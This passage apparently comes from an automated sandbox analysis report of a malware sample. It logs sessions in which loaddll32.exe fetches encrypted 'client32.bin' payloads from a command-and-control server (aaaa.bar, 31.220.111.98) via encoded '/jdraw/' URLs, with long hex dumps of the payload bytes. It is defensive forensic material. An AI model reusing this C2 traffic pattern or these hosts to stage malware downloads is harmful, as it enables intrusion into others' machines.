f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:07 UTC753INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              13192.168.2.54996131.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:05 UTC465OUTGET /jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
                                                              2021-10-20 13:12:06 UTC529INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:05 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:06 UTC530INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
                                                              2021-10-20 13:12:07 UTC593INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:07 UTC609INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:07 UTC641INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:07 UTC705INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:08 UTC768INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:08 UTC784INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:08 UTC801INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:08 UTC817INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:08 UTC833INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:08 UTC851INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:08 UTC867INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:09 UTC883INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:09 UTC899INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              14192.168.2.54996231.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:08 UTC800OUTGET /jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
                                                              2021-10-20 13:12:08 UTC849INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:07 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 1849
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:08 UTC849INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              15192.168.2.54996331.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:08 UTC849OUTGET /jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en
                                                              2021-10-20 13:12:09 UTC914INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:08 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 178758
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Set-Cookie: PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95; path=/; domain=.aaaa.bar
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
